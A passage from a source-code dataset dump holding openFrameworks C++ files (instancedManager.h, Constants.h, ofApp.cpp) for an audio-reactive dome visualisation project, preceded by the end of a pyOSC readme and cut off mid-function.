both of these methods produce less network-traffic than multiple-unicasting.\n\nTo allow for dynamic configuration of which remote clients will receive reply-messages from the OSCMultiClient, an OSC-server that is bound to an OSCMultiClient supports client subscription. By sending messages to the server's '/subscribe' and '/unsubscribe' OSC-addresses, clients can (un)subscribe themselves (or any other client) to receive reply-messages from the OSCMultiClient.\n\nMore info: https://trac.v2.nl/wiki/pyOSC\n" }, { "alpha_fraction": 0.6003130078315735, "alphanum_fraction": 0.6172143816947937, "avg_line_length": 21.314685821533203, "blob_id": "5839317c302d9f09a348cef9121f9c9787374f92", "content_id": "1ce37b7c58c316bb271396f6df9c49acab251f2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3195, "license_type": "no_license", "max_line_length": 56, "num_lines": 143, "path": "/Graphics/apps/videoTest_3/src/instanced/instancedManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n//---------------\n#define MAX_CUBESIZE 0.02\n#define MAX_H_RES 200\n#define MAX_V_RES 100\n#define MAX_VELOCITY 10\n\n#define MAX_NZ_TIME 50\n\n#define MAX_NZ_AMP 0.6\n#define MAX_NZ_FREQ 0.1\n#define MAX_NZ_RUG 0.03\n\n\n//-----------------------\n\nenum InstancedMode {\n LINEAL,\n RAD_CONCENTRIC,\n RAD_CENTRIFUGE\n};\n\nclass InstancedManager {\n\npublic:\n \n void setup(int fboWidth);\n void update();\n void drawScene();\n void exit(){};\n \n \n void setupGui();\n void drawGui();\n \n \n void setMode(InstancedMode m){_mode = m;}\n void setWidth(float w){_width = w*Lim.x;}\n void setHeight(float h){_height= h*Lim.y*2;}\n void setHres(int res){_hRes=res;}\n void setVres(int res){_vRes=res;}\n void setVelocity(float vel){velX = vel;}\n void setNzTime(float t){noiseTime = t;}\n void setXnzFreq(float f){xNoiseFreq = f;}\n void setXnzAmp(float a) {xNoiseAmp = a;}\n void setXnzRug(float r){xNoiseRug = r;}\n void setYnzFreq(float f){yNoiseFreq = f;}\n void setYnzAmp(float a) {yNoiseAmp = a;}\n void setYnzRug(float r){yNoiseRug = r;}\n void setZnzFreq(float f){zNoiseFreq = f;}\n void setZnzAmp(float a) {zNoiseAmp =a;}\n void setZnzRug(float r){zNoiseRug = r;}\n void setLimits(ofVec3f vec){Lim = vec;}\n void setCubeSize(float val);\n void setCubeSize(ofVec3f size);\n void setXpos(float val){xPos = val;}\n void setYpos(float val){yPos=val;}\n void setZpos(float val){zPos=val;}\n void setRadDeform(float val){radDeform = val;}\n void setOrientation(ofVec3f vec){Orient=vec;}\n void setQuilombo(bool b){bDoQuilombo=b;}\n void setMaskRadius(float radius){maskRadius=radius;}\n void setColor(ofColor col){\n mainColor=col;\n material.setDiffuseColor(mainColor);\n }\n \n float getCubeSize(){return cubeSize;}\n \n \n\n \n InstancedMode _mode;\n \n ofVec3f Lim, Orient;\n \n ofVboMesh\tvboMesh;\n ofShader shaderInst;\n \n ofColor mainColor;\n \n float maskRadius;\n \n float _width, _height;\n int _hRes, _vRes;\n int _fboWidth;\n \n float xPos, yPos, zPos;\n \n float radDeform = 0.0;\n \n float velX = 5.0;\n float vSpacing=.5;\n \n float noiseTime = 1.0;\n \n float xNoiseFreq = 0.01;\n float xNoiseAmp = 2.0;\n float xNoiseRug = 2.0;\n \n float yNoiseFreq = 0.01;\n float yNoiseAmp = 2.0;\n float yNoiseRug = 2.0;\n \n float zNoiseFreq = 0.01;\n float zNoiseAmp = 2.0;\n float zNoiseRug = 2.0;\n \n float cubeSize;\n \n bool bDoQuilombo;\n \n int velCounter;\n float YnzCounter;\n \n ofMaterial material;\n \n //gui----------------\n //instanced gui----------------\n ofxPanel guiInstanced;\n ofxToggle gMode, gRadMode;\n ofxFloatSlider gRadDeform;\n \n ofxFloatSlider gWidth, gHeight, gHres,\n gVres, gVelocity, gYpos, gXpos, gZpos;\n \n ofxVec3Slider gCubesize;\n ofxFloatSlider gCubesizeUnified;\n \n ofxFloatSlider gMaskRadius;\n \n ofxFloatSlider gNzTime;\n ofxFloatSlider gNzXAmp, gNzXRug, gNzXFreq;\n ofxFloatSlider gNzYAmp, gNzYRug, gNzYFreq;\n ofxFloatSlider gNzZAmp, gNzZRug, gNzZFreq;\n \n\n\n};\n\n\n" }, { "alpha_fraction": 0.5899999737739563, "alphanum_fraction": 0.6449999809265137, "avg_line_length": 12.333333015441895, "blob_id": "2067565e5d3f10ba0233eda0ce1c3e42bd77d1bd", "content_id": "8d8f8ea3007ca5298531d2715bbfd12d4841cb16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 200, "license_type": "no_license", "max_line_length": 34, "num_lines": 15, "path": "/Graphics/apps/videoTest_2/src/Constants.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// Constants.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#ifndef Constants_h\n#define Constants_h\n\n#define FRAME_RATE 30\n#define DURATION 45.0 //in seconds\n\n#endif /* Constants_h */\n" }, { "alpha_fraction": 0.5131714344024658, "alphanum_fraction": 0.5330389738082886, "avg_line_length": 29.990877151489258, "blob_id": "d4cd2b05ffe6c464439d48006630822c44e811e2", "content_id": "b81b23ddee61fb7a8ce880da9f7dd16e65912a14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 27180, "license_type": "no_license", "max_line_length": 143, "num_lines": 877, "path": "/Graphics/apps/videoTest_3/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//FIXME: esta dado vuelta con el post-processing? no me importa mucho...\n//TODO: make all animations frameNum dependants\n\n#pragma mark - Core Funcs\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetBackgroundColor(0);\n ///FRAME RATE: 30\n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n ofEnableAlphaBlending();\n ofEnableDepthTest();\n \n //Setup settings-----------------\n data.load(\"analysisData.xml\");\n \n int frameRate = data.getValue(\"FILE-INFO:frameRate\",0);\n int totalFramesNum = data.getValue(\"FILE-INFO:totalFramesNum\", 0);\n cout<<\"frameRate - \"<<frameRate<<endl;\n cout<<\"total frames - \"<<totalFramesNum<<endl;\n \n //renderer setup-------------------\n \n framesMaxNumber = totalFramesNum;\n frameCounter = -1;\n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r256);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r512);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r2048);///init resolution and mode\n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r4096);///init resolution and mode\n \n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n //\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n fw = drawFbo.getWidth();\n fh = drawFbo.getHeight();\n \n fboPost.allocate(fw, fh);\n fboPost.begin();\n ofClear(0,0,0,1);\n fboPost.end();\n \n fboInstanced.allocate(fw, fh, GL_RGBA);\n fboInstanced.begin();\n ofClear(255,255,255, 0);\n fboInstanced.end();\n \n fboParticles.allocate(fw, fh, GL_RGBA);\n fboParticles.begin();\n ofClear(255,255,255, 0);\n fboParticles.end();\n \n fboSphere.allocate(fw, fh, GL_RGBA);\n fboSphere.begin();\n ofClear(255,255,255, 0);\n fboSphere.end();\n \n \n //gui-------------\n setupGui();\n bShowGuiCubeSphere =false;\n bShowGuiPair = bShowGuiInstanced = true;\n \n \n //----------------------------\n _center.set(fw*0.5, fh*0.5, 0.0);\n cam.disableMouseInput();\n cam.setPosition(ofVec3f(_center.x, _center.y, fw*0.7));\n cam.lookAt(_center);\n cam.setTarget(_center);\n \n light.setPosition(fw*0.2, fw*.5, fh*0.3);\n light.setPointLight();\n \n //Instanced---------------------------\n instanced.setup(fw);\n instanced.setLimits(ofVec3f(fw, fh, 100));\n instanced.setOrientation(ofVec3f(1,1,1));\n instanced.setColor(COLOR_INSTANCED);\n \n //Particles------------------\n pair.setup(0, fh*0.5, fw, fh, OUT);\n pair.setColor(COLOR_PARTICLES);\n \n //Sphere------------------------\n sphere.setup();\n sphere.setColor(COLOR_SPHERE);\n sphere.setPosition(_center);\n \n //Post-Procesing-------------------------------\n postManager.setup(fw, fh);\n \n //OSC------------------------------------------\n receiver.setup(PORT);\n oscPower = 0.0;\n oscFreq = 0.0;\n oscConfidence = 0.0;\n oscSalience = 0.0;\n oscHfc = 0.0;\n oscCentroid = 0.0;\n oscSpecComp = 0.0;\n oscInharm = 0.0;\n oscOnset = false;\n oscTLtrack = 0.0;\n \n \n lastFrameWithOnset = 0;\n isReallyOnset = false;\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n \n //animation frameNumUpdate\n if(isAnimating){\n frameCounter++;\n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n \n \n //receiveOsc----------------\n if(gReceiveOSC){\n //receiveOsc();\n updateOscFromDataFile(frameCounter);\n }else{\n \n }\n \n //check trigger onset---------------------\n if(oscOnset && isAnimating){\n if(frameCounter-lastFrameWithOnset > 10){\n isReallyOnset = true;\n triggerOnset();\n lastFrameWithOnset = frameCounter;\n }\n }else{\n isReallyOnset=false;\n }\n\n \n //update graphics--------------------------------\n updateInstanced();\n updatePair();\n \n \n //update post-processing------------------------\n postManager.updateValues();\n \n //light pos\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * 0.8*fw );\n \n \n\n ///-------------------------------\n \n \n //-----------------------------------\n \n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n \n ///draw openGL scene in drawFbo------------------\n drawFboInstanced();\n drawFboParticles();\n drawFboSphere();\n \n drawFboMain();\n \n drawFboPost();\n ///-------------------------------\n \n \n fisheyeAmount = 0.6;\n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(fboPost.getTexture(), rw, rh, fisheyeAmount);///which fbo to render\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n \n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n ofBackground(0);\n \n \n //fboPost.draw(ofGetWidth()-768, 0, fw, fh);\n renderer.draw(ofGetWidth()-768, 0, 768, 768);\n\n \n //drawGuis------------------\n if (bShowGuiInstanced)\n instanced.drawGui();\n if(bShowGuiPair)\n guiPair.draw();\n if(bShowGuiCubeSphere)\n sphere.drawGui();\n \n guiMain.draw();\n \n postManager.drawGui(200,500);\n \n \n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n \n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, ofGetWidth()-200, 20);\n ofPopStyle();\n \n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString() +\n + \"\\nframeCounter: \" + ofToString(frameCounter);\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, ofGetWidth()-200, ofGetHeight()-100);\n ofPopStyle();\n\n \n \n \n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n case 'a':\n pair.addPartGroup(1);\n break;\n case 'k':\n pair.addPartGroup(2);\n break;\n \n \n \n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //FIXME: change resolutions arent working, setups needed\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n\n }\n break;\n \n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n \n default:\n break;\n }\n \n}\n#pragma mark - Fbo draw funcs\n//--------------------------------------------------------------\nvoid ofApp::drawDomeLimits(int w, int h){\n \n \n //ofBackground(255);\n int x = w*0.5;\n int y = h*0.5;\n int rad = w*0.5;\n \n ofPushStyle();\n ofSetCircleResolution(30);\n ofNoFill();\n //full\n ofSetColor(ofColor::red);\n ofDrawCircle(x,y,rad);\n// //mid\n// ofSetColor(ofColor::orange);\n// ofDrawCircle(x,y,rad*0.66);\n// //small\n// ofSetColor(ofColor::yellow);\n// ofDrawCircle(x,y,rad*0.33);\n \n \n ofPopStyle();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboPost(){\n\n fboPost.begin();\n ofClear(0,0,0,1);\n \n ofDisableAlphaBlending();\n \n postManager.begin();\n drawFbo.draw(0,0);\n postManager.end();\n \n fboPost.end();\n \n ofEnableAlphaBlending();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboMain(){\n \n drawFbo.begin();\n \n\n ofClear(0, 0, 0, 0);\n\n if(gDoDrawParts) fboParticles.draw(0,0);\n \n if(gDoDrawInstanced)fboInstanced.draw(0,0);\n \n if(gDoDrawSphere) fboSphere.draw(0,0);\n \n if(gDoDrawDomeLimits) drawDomeLimits(fw, fh);\n \n drawFbo.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboInstanced(){\n \n \n ofEnableAlphaBlending();\n \n fboInstanced.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n \n cam.begin();\n \n //??? hacen falta estos guachines?\n ofEnableDepthTest();\n ofDisableAlphaBlending();\n //-----------------------\n \n instanced.drawScene();\n \n \n ofDisableDepthTest();//??? hace falta?\n \n cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n //----------------------------\n fboInstanced.end();\n \n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboParticles(){\n\n fboParticles.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n\n if(gUseCam)cam.begin();\n\n \n ofEnableDepthTest();\n ofEnableAlphaBlending();\n \n ///DRAW pair\n pair.drawScene();\n \n \n if(gUseCam)cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n ofDisableDepthTest();\n //----------------------------\n fboParticles.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboSphere(){\n \n fboSphere.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n \n \n ofEnableDepthTest();\n \n \n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n\n cam.begin();\n \n\n ///drawSphere---------\n sphere.drawScene();\n ///---------\n \n \n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n cam.end();\n \n ofDisableDepthTest();\n \n //----------------------------\n fboSphere.end();\n\n}\n#pragma mark - Updates\n//--------------------------------------------------------------\nvoid ofApp::updatePair(){\n \n int w = fw;\n \n guiPair.update();\n \n std::map<string, float> oscData;\n \n \n oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold;///osc\n oscData[KEY_PARTS_NUM] = guiPair.gPartsNum;\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity;///osc\n //oscData[KEY_RADIUS_INIT] = guiPair.gRadiusInit;\n oscData[KEY_RADIUS_INIT] = 0.009 * w;\n oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar;///osc\n oscData[KEY_ANGLE_INIT] = guiPair.gAngleInit;\n oscData[KEY_ANGLE_VAR] = guiPair.gAngleVar;///osc\n //nz\n oscData[KEY_ANGLE_NZ_AMP] = guiPair.gNzAngleAmp;///osc\n oscData[KEY_ANGLE_NZ_FREQ] = guiPair.gNzAngleFreq;\n// oscData[KEY_RADIUS_NZ_AMP] = guiPair.gNzRadAmp;///osc\n oscData[KEY_RADIUS_NZ_AMP] = 0.002 * w;///osc\n oscData[KEY_RADIUS_NZ_FREQ]= guiPair.gNzRadFreq;\n oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;///osc\n oscData[KEY_X_NZ_FREQ] = guiPair.gNzXposFreq;\n oscData[KEY_PART_SIZE] = 10; ///osc\n \n if(gReceiveOSC){\n \n //oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold * oscCentroid * oscCentroid;\n //oscData[KEY_DIST_TRESHOLD] = 460 * oscCentroid * oscCentroid;\n if(oscHfc>0.5){\n oscData[KEY_DIST_TRESHOLD] = w * oscHfc;\n }\n \n// oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar * oscCentroid;\n oscData[KEY_RADIUS_VAR] = 0.2*w * oscCentroid;\n \n oscData[KEY_ANGLE_VAR] = 0.025 * oscSpecComp * oscSpecComp ;\n //oscData[KEY_ANGLE_VAR] = 0.132 * oscSpecComp * oscSpecComp ;\n \n// oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;\n oscData[KEY_X_NZ_AMP] = 0.38 * w;\n \n// oscData[KEY_X_VELOCITY] = guiPair.gXvelocity*0.5 + guiPair.gXvelocity*oscCentroid;\n oscData[KEY_X_VELOCITY] = 0.8*w *0.5 + 0.8*w *oscCentroid;\n \n oscData[KEY_PART_SIZE] = 0.004*w + oscPower*0.004*w;\n }\n\n std::map<string, float> pairData_A = oscData;\n std::map<string, float> pairData_B = oscData;\n \n\n// pair.setDistanceTreshold(guiPair.gDistTreshol/d * oscPower * oscPower * 5);///fixme\n pair.setDistanceTreshold(0.07*w * oscPower * oscPower * 5);\n \n pair.update(pairData_A, pairData_B);\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateSphere(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float val1 = oscCentroid;\n float val2 = oscSpecComp;\n \n x = oscCentroid * sphere.xGui;\n y = .001 + oscSpecComp * sphere.yGui;\n vol = 0.25 + oscPower * sphere.volumeGui;\n rad = 10 + oscSpecComp * sphere.radiusGui;\n res = sphere.dispResolution;\n vel = 1;\n \n sphere.dispNzAmnt = sphere.strengthGui;\n \n //sphere.displacement.update(sphere.xGui, sphere.yGui, sphere.volumeGui, sphere.radiusGui, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n sphere.displacement.update(x, y, vol, rad, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateInstanced(){\n \n int w = fw;\n \n //update instancedManager values\n if(!instanced.gMode)instanced.setMode(LINEAL);\n else if(instanced.gMode && !instanced.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(instanced.gMode && instanced.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(instanced.gRadDeform);\n }\n \n instanced.setWidth(instanced.gWidth);\n instanced.setHeight(instanced.gHeight);\n instanced.setCubeSize(instanced.gCubesizeUnified * MAX_CUBESIZE*w);\n \n instanced.setMaskRadius(instanced.gMaskRadius);///osc\n \n instanced.setHres(instanced.gHres * MAX_H_RES);\n instanced.setVres(instanced.gVres * MAX_V_RES);\n \n instanced.setVelocity(instanced.gVelocity * MAX_VELOCITY);///osc\n \n instanced.setXpos(instanced.gXpos);\n instanced.setYpos(instanced.gYpos);\n instanced.setZpos(instanced.gZpos);\n //nz\n instanced.setNzTime(instanced.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(instanced.gNzXAmp * MAX_NZ_AMP*w);///osc\n instanced.setXnzFreq(instanced.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(instanced.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(instanced.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(instanced.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(instanced.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(instanced.gNzZAmp * MAX_NZ_AMP*w);///osc\n instanced.setZnzFreq(instanced.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(instanced.gNzZRug * MAX_NZ_RUG*w);\n \n if(gReceiveOSC){\n// instanced.setVelocity(oscPower * oscPower * 0.7 * MAX_VELOCITY);//10\n instanced.setVelocity(oscPower * oscPower * 0.7 * MAX_VELOCITY);//10\n \n instanced.setZnzAmp(oscCentroid*oscCentroid * 6 * MAX_NZ_AMP*w);\n \n// instanced.setZnzAmp(oscCentroid * instanced.gNzZAmp*3 * MAX_NZ_AMP*w);\n \n instanced.setXnzAmp(oscSpecComp * oscSpecComp * MAX_NZ_AMP*w);\n \n if(isReallyOnset)instanced.setMaskRadius(0.0);\n else instanced.setMaskRadius(0.5 - oscTLtrack*0.5);\n \n \n }\n\n\n}\n\n#pragma mark - Other funcs\n//--------------------------------------------------------------\nvoid ofApp::setupGui(){\n \n //-----------------------------------\n guiMain.setup(\"Main Panel\");\n guiMain.setPosition(0, 0);\n guiMain.add(gDoPostProcessing.setup(\"Post-Proc\", true));\n guiMain.add(gReceiveOSC.setup(\"Receive Osc\", true));\n guiMain.add(gDoDrawInstanced.setup(\"Draw Inst\", true));\n guiMain.add(gDoDrawSphere.setup(\"Draw Sphere\", false));\n guiMain.add(gDoDrawParts.setup(\"Draw Parts\", true));\n guiMain.add(gDoDrawDomeLimits.setup(\"Draw Dome Lim\", true));\n guiMain.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5), ofVec3f(0.0), ofVec3f(0.5)));\n guiMain.add(gUseCam.setup(\"useCam\", true));\n guiMain.add(gAxis.setup(\"axis\", true));\n guiMain.add(gUseLight.setup(\"useLight\", true));\n guiMain.add(gFisheye.setup(\"fisheye\", 0.6, 0.0, 1.0));\n\n \n //--------------------------\n //??? mandarlo al particleSystemPair?\n guiPair.setup();\n guiPair.gui.setPosition(200, 0);\n\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::resetCamera(){\n \n cam.setPosition(ofVec3f(fw*0.5, fh*0.5, 500.0));\n cam.lookAt(ofVec3f( fw*0.5, fh*0.5, 0.0));\n cam.setTarget(ofVec3f( fw*0.5, fh*0.5, 0.0));\n\n}\n//--------------------------------------------------------------\nvoid ofApp::triggerOnset(){\n \n pair.addPartGroup(1);\n pair.addPartGroup(2);\n\n}\n//--------------------------------------------------------------\nvoid ofApp::updateOscFromDataFile(int frameNum){\n \n string frameNumStr = ofToString(frameNum);\n \n oscPower = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:POWER\",0.0);\n \n oscFreq = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHFREQ\", 0.0);\n \n oscConfidence = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHCONF\", 0.0);\n \n oscSalience = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SALIENCE\", 0.0);\n \n oscHfc = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:HFC\", 0.0);\n \n oscCentroid = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:CENTROID\", 0.0);\n \n oscSpecComp = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SPECCOMP\", 0.0);\n \n oscInharm = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:INHARM\", 0.0);\n \n oscOnset = 